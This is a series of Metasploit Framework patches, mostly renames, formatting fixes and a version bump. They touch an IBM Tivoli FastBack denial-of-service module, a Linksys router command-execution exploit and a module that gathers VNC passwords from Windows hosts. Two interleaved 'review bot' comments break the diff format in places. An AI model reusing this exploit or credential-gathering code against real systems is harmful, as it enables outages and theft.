From: James Lee <egypt@metasploit.com> Date: Thu, 18 Feb 2016 15:14:35 -0600 Subject: [PATCH 65/71] Fix extra whitespace and unused vars in call --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index f04adddfdf..2a7d55a2ea 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => " Server Opcode 0x534 Denial of Service", + 'Name' => "Server Opcode 0x534 Denial of Service", 'Description' => %q{ This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server when dealing with packets triggering the opcode 0x534 handler. @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary print_status("Sending malicious packet") p = tv_pkt(target_opcode, - p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], - p2 = Rex::Text.rand_text_alpha(0x60), - p3 = Rex::Text.rand_text_alpha(0x60) + "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + Rex::Text.rand_text_alpha(0x60), + Rex::Text.rand_text_alpha(0x60) ) sock.put(p) From d316609fef3ef1ec68450a275bd78d87ae4c36dc Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 15:36:43 -0600 Subject: [PATCH 66/71] put extra columns under the -x flag --- lib/msf/base/serializer/readable_text.rb | 6 +++--- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index b93cd55bc0..ae2cca777a 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb 
@@ -524,7 +524,7 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false - show_checkin = opts[:show_checkin] || false + show_extended = opts[:show_extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap @@ -533,7 +533,7 @@ class ReadableText columns = [] columns << 'Id' columns << 'Type' - columns << 'Checkin?' if show_checkin + columns << 'Checkin?' if show_extended columns << 'Information' columns << 'Connection' @@ -556,7 +556,7 @@ class ReadableText row << session.type.to_s row[-1] << (" " + session.platform) if session.respond_to?(:platform) - if show_checkin + if show_extended if session.respond_to?(:last_checkin) && session.last_checkin row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" else diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d5080f9f40..da0ee05517 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -35,7 +35,6 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( "-c" => [ true, "Run a command on the session given with -i, or all" ], - "-ci" => [ false, "Show the last checkin time in the session table" ], "-h" => [ false, "Help banner" ], "-i" => [ true, "Interact with the supplied session ID " ], "-l" => [ false, "List all active sessions" ], 
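Review bot: `dump_sessions` now reads only `opts[:show_extended]`, so a caller that still passes `:show_checkin` silently loses the `Checkin?` column with no error. The one caller visible in this patch (the `list` branch in core.rb) is updated, but callers outside the diff cannot be checked from here. Accepting both keys for a transition keeps them working: `show_extended = opts[:show_extended] || opts[:show_checkin] || false`. A comment above the method listing the recognised `opts` keys would also help, since the flag is now described as "extended information" while only the check-in column is gated on it in the hunks shown. The body of `dump_sessions` continues outside these hunks.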
@@ -46,7 +45,8 @@ class Core "-s" => [ true, "Run a script on the session given with -i, or all" ], "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)" ]) + "-t" => [ true, "Set a response timeout (default: 15)" ], + "-x" => [ false, "Show extended information in the session table" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -1760,7 +1760,7 @@ class Core begin method = nil quiet = false - show_checkin = false + show_extended = false verbose = false sid = nil cmds = [] @@ -1781,8 +1781,8 @@ class Core when "-c" method = 'cmd' cmds << val if val - when "-ci" - show_checkin = true + when "-x" + show_extended = true when "-v" verbose = true # Do something with the supplied session identifier instead of @@ -2045,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :show_checkin => show_checkin, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose)) print_line end From a82ce40c401c54e45acdd24364ec6162deefa841 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 14:33:35 -0600 Subject: [PATCH 67/71] Update ibm_tsm_dos name For some reason I actually modified the name, but I didn't mean to. --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 2a7d55a2ea..d04a70f6a0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb 
@@ -12,7 +12,7 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => "Server Opcode 0x534 Denial of Service", + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", 'Description' => %q{ This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server when dealing with packets triggering the opcode 0x534 handler. From 3b9502cb1d6817992666f025b8ca4cd68c33ffb7 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 18:45:04 -0600 Subject: [PATCH 68/71] Don't require username in wrt110 module. --- modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index c8d41f7060..07ef38cb19 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options([ - OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), + OptString.new('USERNAME', [ false, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) From b58166a9a84f1bbb045c2dccd43472ab57722012 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 20:13:39 -0600 Subject: [PATCH 69/71] add android platform to the hash --- modules/post/multi/manage/play_youtube.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 3d44dba25c..b4b18d615c 100644 --- a/modules/post/multi/manage/play_youtube.rb 
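Review bot: In the `linksys_wrt110_cmd_exec.rb` hunk the `USERNAME` description still reads as a mandatory credential ("Valid router administrator username") after the required flag flips to `false`. The text should say the value may be left blank, e.g. `'Router administrator username (may be blank)'`. The code that reads `datastore['USERNAME']` is outside this hunk, so whether it tolerates an unset value cannot be confirmed from here and is worth checking alongside this change.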
+++ b/modules/post/multi/manage/play_youtube.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win', 'osx', 'linux' ], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) From bfd204ac502015450583cdb749b64b0d4b6ffd59 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Fri, 19 Feb 2016 15:00:56 -0600 Subject: [PATCH 70/71] Fix some cosmetic issues --- modules/post/windows/gather/credentials/vnc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 040a6a436c..0442f20835 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Post #check uninstall key begin root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") - open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) vnclocation = open_key.query_value("InstallLocation").data locations << {:name => 'UltraVNC', - :check_file => vnclocation + "\\ultravnc.ini", - :pass_variable => 'passwd=', - :viewonly_variable => 'passwd2=', - :port_variable => 'PortNumber='} + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} rescue Rex::Post::Meterpreter::RequestError => e vprint_error(e.message) end From b868f7cc89bee907e3c3e007947b65aadde105a0 Mon Sep 17 00:00:00 2001 
From: Metasploit <metasploit@rapid7.com> Date: Fri, 19 Feb 2016 20:19:43 -0800 Subject: [PATCH 71/71] Bump version of framework to 4.11.12 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..c0937476b4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.11) + metasploit-framework (4.11.12) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index a5241a7344..76417d3584 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.11" + VERSION = "4.11.12" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash